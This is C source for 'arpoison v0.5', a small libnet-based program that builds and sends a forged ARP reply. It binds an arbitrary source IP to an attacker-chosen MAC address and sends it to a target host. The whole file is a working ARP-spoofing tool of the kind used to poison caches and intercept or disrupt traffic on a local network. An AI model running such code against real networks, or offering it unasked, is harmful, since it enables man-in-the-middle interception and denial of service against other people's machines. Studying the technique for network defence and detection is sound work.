/* arpoison v0.5 -- Steve Buer */ 

#include <libnet.h>
#include <errno.h>
#include <unistd.h>
#include <stdio.h>

void get_ip_addr(struct in_addr *, char *);

int main(int argc, char *argv[])
{
        /* various variables */
        int n, c, z;
        int packet_size = LIBNET_ETH_H + LIBNET_ARP_H;  
        u_long SrcIP, DstIP;
        u_char *packet;
        u_char *device;
	char err_buf[LIBNET_ERRBUF_SIZE];
        struct libnet_link_int *network; 
	unsigned int p[6];
	u_char DstHW[6]; 
        u_char SrcHW[6]; 

/* parse args etc */

	if (argc != 11)
	{
	 printf("Usage: %s -i <device> -d <dest IP> -s <src IP> -t <target MAC> -r <src MAC>\n", argv[0]);
	 exit(1);
	}
        while ((z = getopt(argc, argv, "d:s:i:t:r:")) != EOF)
        {
	  switch (z)
          {
		case 'd':
		   DstIP = inet_addr(optarg); 
		   if (DstIP == -1)
		   {
			perror("inet_addr(dst)");
			exit(1);
		   }
		   break;

                case 's':
                   SrcIP = inet_addr(optarg);
                   if (SrcIP == -1)
		   {
			perror("inet_addr(src)");
			exit(1);
		   }
         	   break;

          	case 'i':
		   device = optarg;
		   break;	
	    
		case 't':
		    n = sscanf(optarg, "%x:%x:%x:%x:%x:%x",
                                     &p[0],
                                     &p[1],
				     &p[2],
				     &p[3],
				     &p[4],
				     &p[5]);		
                    if (n != 6)
			{
			    printf("error parsing MAC\n");
			    exit(1);
			}		     
		    for ( c = 0 ; c < 6 ; c++)
		    {
		       DstHW[c] = p[c];
		    }
                    break; 

		case 'r':
		    n = sscanf(optarg, "%x:%x:%x:%x:%x:%x",
                                     &p[0],
                                     &p[1],
				     &p[2],
				     &p[3],
				     &p[4],
				     &p[5]);		
                    if (n != 6)
			{
			    printf("error parsing MAC\n");
			    exit(1);
			}		     
		    for ( c = 0 ; c < 6 ; c++)
		    {
		       SrcHW[c] = p[c];
		    }
                    break; 

            }     
        }

        /* allocate memory for packet */
	n = libnet_init_packet(packet_size, &packet);  
	if (n != 1)
         {
	  printf("libnet_init_packet: error\n");
          exit(1);
         }





        /* ethernet header */
        n = libnet_build_ethernet(
                DstHW,         /* dst HW addr */
                SrcHW,         /* src HW addr */
                0x0806,         /* ether packet type */
                NULL,           /* ptr to payload */
                0,              /* payload size */
                packet);        /* ptr to packet memory */ 
	if (n == -1)
	{
	  perror("libnet_build_ethernet");
	  exit(1);
	}

        /* ARP header */

        n = libnet_build_arp( 
                1,              /* hardware type */
                0x0800,         /* proto type */
                6,              /* hw addr size */
                4,              /* proto addr size */ 
                2,              /* ARP REPLY */
                SrcHW,         /* source HW addr */
                (u_char *)&SrcIP,         /* src proto addr */
                DstHW,        /* dst HW addr */
                (u_char *)&DstIP,         /* dst IP addr */
                NULL,           /* no payload */
                0,              /* payload length */
        packet + LIBNET_ETH_H); /* packet buffer memory */
	if (n == -1)
	{
	  perror("libnet_build_arp");
	  exit(1);
	} 

        /* open the link-layer interface */
        network = libnet_open_link_interface(device, err_buf);
	if (network == NULL)
	{
	  perror("libnet_open_link_interface");
	  exit(1);
	}

	/* inject the mofo !! */
	n = libnet_write_link_layer(network,
				device, 
				packet, 
			        packet_size);
	if (n < packet_size)
	{
	   printf("libnet_write_link_layer only wrote %d of %d bytes\n", n, packet_size);
	}	

	/* output */
	printf("ARP packet sent via %s\n", device);

        /* 
         * Shut down the interface 
         */
        n = libnet_close_link_interface(network);  
	if (n == -1)
	{
		perror("libnet_close_link_interface");
		exit(1);
	}

        /* 
         * free packet memory 
         */
    
        libnet_destroy_packet(&packet); 

  return 0;
 }

